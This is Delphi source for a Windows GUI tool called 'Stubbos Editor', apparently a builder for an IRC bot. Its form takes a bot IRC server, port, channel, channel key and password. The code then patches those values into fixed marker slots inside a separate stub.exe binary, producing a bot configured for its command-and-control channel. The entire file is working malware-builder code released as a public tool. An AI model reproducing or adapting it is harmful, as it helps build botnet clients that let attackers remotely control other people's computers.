program StubbEditor;

{$R *.res}

// libraries
uses
  Windows,
  Messages;

// global uses
var
  wClass        :TWNDClass;
  Handle        :HWND;
  hFont         :HWND;
  hInst         :HWND;

  hServLabel    :HWND;
  hPortLabel    :HWND;
  hChanLabel    :HWND;
  hCKeyLabel    :HWND;
  hPassLabel    :HWND;

  eServ         :HWND;
  ePort         :HWND;
  eChan         :HWND;
  eCKey         :HWND;
  ePass         :HWND;

  hSave         :HWND;
  hAbout        :HWND;
  hExit         :HWND;

  bSave         :Pointer;
  bAbout        :Pointer;
  bExit         :Pointer;

  Msg           :TMSG;

Procedure GetLabel(Var Text: String; HNDLE: HWND);
Var
  Count : Integer;
  Test  : Integer;
Begin
  Count := SendMessage(HNDLE, WM_GETTEXTLENGTH, 0, 0);
  Text := '';
  If (Count > 0) Then
  Begin
    SetLength(Text, Count);
    SendMessage(HNDLE, WM_GETTEXT, Count+1, LongInt(@Text[1]));
  End;
End;

Procedure SetLabel(Text:String;HNDLE:HWND);
Begin
  SetWindowText(HNDLE, pChar(Text));
End;

Function SetFont(FontName: String): HWND;
Begin
  Result := CreateFont(-11, 0, 0, 0,
                         0, 0, 0, 0,
                         DEFAULT_CHARSET,
                         OUT_DEFAULT_PRECIS,
                         CLIP_DEFAULT_PRECIS,
                         DEFAULT_QUALITY,
                         DEFAULT_PITCH or FF_DONTCARE,
                         pChar(FontName));
End;

Procedure ButtExit;
Begin
  ExitProcess(0);
End;

Function IsNumeric(Str: String): Bool;
Var
  I: Integer;
  N: String;
Begin
  Result := True;
  N := '0123456789';
  For I := 1 To Length(Str) Do
    If (Pos(Str[I], N) = 0) Then
    Begin
      Result := False;
      Break;
    End;
End;

Procedure WriteFileStr(Name: String; Output: String);
Var
  cFile :Textfile;
Begin
  Try
    AssignFile(cFile, Name);
    Rewrite(cFile);
    Write(cFile, Output);
    CloseFile(cFile);
  Except
    ;
  End;
End;

Procedure ReadFileStr(Name: String; Var Output: String);
Var
  cFile :File Of Char;
  Buf   :Array [1..1024] Of Char;
  Len   :LongInt;
  Size  :LongInt;
Begin
  Try
    Output := '';

    AssignFile(cFile, Name);
    Reset(cFile);
    Size := FileSize(cFile);
    While Not (Eof(cFile)) Do
    Begin
      BlockRead(cFile, Buf, 1024, Len);
      Output := Output + String(Buf);
    End;
    CloseFile(cFile);

    If Length(Output) > Size Then
      Output := Copy(Output, 1, Size);
  Except
    ;
  End;
End;

function FileExists(const FileName: string): Boolean;
var
lpFindFileData: TWin32FindData;
hFile: Cardinal;
begin
  hFile := FindFirstFile(PChar(FileName), lpFindFileData);
  if hFile <> INVALID_HANDLE_VALUE then
  begin
    result := True;
    Windows.FindClose(hFile)
  end
  else
    result := False;
end;

Function FixLen(Str: String; C: Integer): String;
Begin
  While (Length(Str) < C) Do
    Str := Str + ' ';
  Result := Str;
End;

Procedure SaveSettings(Server,Port,Channel,Key,Pass: String);
Var
  Content: String;
  P      : Integer;
Begin
  If NOT (FileExists('stub.exe')) Then
  Begin
    MessageBox(0, 'Error, check so stubb.exe is existing', 'Error', mb_ok);
    Exit;
  End;

  Try
    ReadFileStr('stub.exe', Content);

    P := Pos('~pa?', Content);
    If (P > 0) Then
    Begin
      Delete(Content, P+4, 20);
      Insert(FixLen(Pass,20), Content, P+4);
    End;
    p := 0;

    P := Pos('~ks?', Content);
    If (P > 0) Then
    Begin
      Delete(Content, P+4, 20);
      Insert(FixLen(Key,20), Content, P+4);
    End;
    p := 0;

    P := Pos('~cs?', Content);
    If (P > 0) Then
    Begin
      Delete(Content, P+4, 20);
      Insert(FixLen(Channel,20), Content, P+4);
    End;
    p := 0;

    P := Pos('~ps?', Content);
    If (P > 0) Then
    Begin
      Delete(Content, P+4, 5);
      Insert(FixLen(Port,5), Content, P+4);
    End;
    p := 0;

    P := Pos('~bs?', Content);
    If (P > 0) Then
    Begin
      Delete(Content, P+4, 40);
      Insert(FixLen(Server,40), Content, P+4);
    End;
    p := 0;

    WriteFileStr('stub.exe', Content);
  Except
    MessageBox(0, 'Error, check so stub.exe is existing', 'Error', mb_ok);
  End;
End;

Procedure ButtSave;
Var
  Server        :String;
  Port          :String;
  Channel       :String;
  Key           :String;
  Pass          :String;
Begin
  GetLabel(Server , eServ);
  GetLabel(Port   , ePort);
  GetLabel(Channel, eChan);
  GetLabel(Key    , eCKey);
  GetLabel(Pass   , ePass);

  If NOT (IsNumeric(Port)) Then
  Begin
    MessageBox(0, 'Your port need to be only numbers', 'Error', mb_ok);
    Exit;
  End;

  If (Server = '') Then
  Begin
    MessageBox(0, 'You need to fill in a server', 'Error', mb_ok);
    Exit;
  End;

  If (Channel = '') or (copy(channel,1,1) <> '#') Then
  Begin
    MessageBox(0, 'You need to fill in a channel starting with #', 'Error', mb_ok);
    Exit;
  End;

  If (Pass = '') Then
  Begin
    MessageBox(0, 'You need to fill in a password', 'Error', mb_ok);
    Exit;
  End;

  SaveSettings(Server,Port,Channel,Key,Pass);
End;

Procedure ButtAbout;
Begin
  MessageBox(0, 'Made by p0ke (http://p0ke.no-ip.com)', 'About', mb_ok);
End;

function WindowProc(hWnd,Msg,wParam,lParam:Longint):Longint; stdcall;
begin
  Result := DefWindowProc(hWnd,Msg,wParam,lParam);
  Case Msg Of
    WM_COMMAND :
    Begin
      If lparam = hExit  Then ButtExit;
      If lparam = hSave  Then ButtSave;
      If lparam = hAbout Then ButtAbout;
    End;
    WM_DESTROY : Begin
      ExitProcess(0);
    end;
  End;
end;

Begin

  hInst := GetModuleHandle(NIL);

  With wClass Do
  Begin
    Style :=            CS_PARENTDC;
    hIcon :=            LoadIcon(hInst, 'MAINICON');
    lpfnWndProc :=      @WindowProc;
    hInstance :=        hInst;
    hbrBackground :=    COLOR_BTNFACE+1;
    lpszClassName :=    'Stubbos Edit';
    hCursor :=          LoadCursor(0, IDC_ARROW);
  End;

  RegisterClass(wClass);

  Handle     := CreateWindow(
  'Stubbos Edit', 'Stubbos Editor Public Version 1.0',
  WS_EX_STATICEDGE or WS_VISIBLE, 400, 320, 300, 163,
  0, 0, hInst, NIL);

  hServLabel := CreateWindow(
  'Static', 'Bot IRC Server: ',
  WS_CHILD or SS_LEFT or WS_VISIBLE, 10, 10, 120, 20,
  Handle, 0, hInst, NIL);

  hPortLabel := CreateWindow(
  'Static', 'Bot IRC Port: ',
  WS_CHILD or SS_LEFT or WS_VISIBLE, 10, 30, 120, 20,
  Handle, 0, hInst, NIL);

  hChanLabel := CreateWindow(
  'Static', 'Bot IRC Channel: ',
  WS_CHILD or SS_LEFT or WS_VISIBLE, 10, 50, 120, 20,
  Handle, 0, hInst, NIL);

  hCKeyLabel := CreateWindow(
  'Static', 'Bot IRC Channel Key: ',
  WS_CHILD or SS_LEFT or WS_VISIBLE, 10, 70, 120, 20,
  Handle, 0, hInst, NIL);

  hPassLabel := CreateWindow(
  'Static', 'Bot IRC Password: ',
  WS_CHILD or SS_LEFT or WS_VISIBLE, 10, 90, 120, 20,
  Handle, 0, hInst, NIL);

  SendMessage(hServLabel, WM_SETFONT, SetFont('Arial'), 0);
  SendMessage(hPortLabel, WM_SETFONT, SetFont('Arial'), 0);
  SendMessage(hChanLabel, WM_SETFONT, SetFont('Arial'), 0);
  SendMessage(hCKeyLabel, WM_SETFONT, SetFont('Arial'), 0);
  SendMessage(hPassLabel, WM_SETFONT, SetFont('Arial'), 0);

  eServ := CreateWindow(
           'Edit', '',
           WS_CHILD or BS_TEXT or WS_VISIBLE or WS_BORDER or ES_AUTOHSCROLL,
           130, 10, 150, 15,
           Handle, 0, hInst, NIL);

  ePort := CreateWindow(
           'Edit', '',
           WS_CHILD or BS_TEXT or WS_VISIBLE or WS_BORDER or ES_AUTOHSCROLL,
           130, 30, 150, 15,
           Handle, 0, hInst, NIL);

  eChan := CreateWindow(
           'Edit', '',
           WS_CHILD or BS_TEXT or WS_VISIBLE or WS_BORDER or ES_AUTOHSCROLL,
           130, 50, 150, 15,
           Handle, 0, hInst, NIL);

  eCKey := CreateWindow(
           'Edit', '',
           WS_CHILD or BS_TEXT or WS_VISIBLE or WS_BORDER or ES_AUTOHSCROLL,
           130, 70, 150, 15,
           Handle, 0, hInst, NIL);

  ePass := CreateWindow(
           'Edit', '',
           WS_CHILD or BS_TEXT or WS_VISIBLE or WS_BORDER or ES_AUTOHSCROLL,
           130, 90, 150, 15,
           Handle, 0, hInst, NIL);

  SendMessage(eServ, WM_SETFONT, SetFont('Arial'), 0);
  SendMessage(ePort, WM_SETFONT, SetFont('Arial'), 0);
  SendMessage(eChan, WM_SETFONT, SetFont('Arial'), 0);
  SendMessage(eCKey, WM_SETFONT, SetFont('Arial'), 0);
  SendMessage(ePass, WM_SETFONT, SetFont('Arial'), 0);

  hSave := CreateWindow(
          'Button', 'Save',
          WS_CHILD or BS_PUSHLIKE or BS_TEXT or WS_VISIBLE,
          8, 110, 50, 20,
          Handle, 0, hInst, NIL);

  hAbout := CreateWindow(
          'Button', 'About',
          WS_CHILD or BS_PUSHLIKE or BS_TEXT or WS_VISIBLE,
          62, 110, 50, 20,
          Handle, 0, hInst, NIL);

  hExit := CreateWindow(
          'Button', 'Exit',
          WS_CHILD or BS_PUSHLIKE or BS_TEXT or WS_VISIBLE,
          116, 110, 50, 20,
          Handle, 0, hInst, NIL);

  SendMessage(hSave , WM_SETFONT, SetFont('Arial'), 0);
  SendMessage(hExit , WM_SETFONT, SetFont('Arial'), 0);
  SendMessage(hAbout, WM_SETFONT, SetFont('Arial'), 0);

  bExit  := Pointer(GetWindowLong(hExit, GWL_WNDPROC));
  bSave  := Pointer(GetWindowLong(hSave, GWL_WNDPROC));
  bAbout := Pointer(GetWindowLong(hAbout, GWL_WNDPROC));

  While (GetMessage(Msg, Handle, 0, 0)) Do
  Begin
    TranslateMessage(Msg);
    DispatchMessage (Msg);
  End;

End.
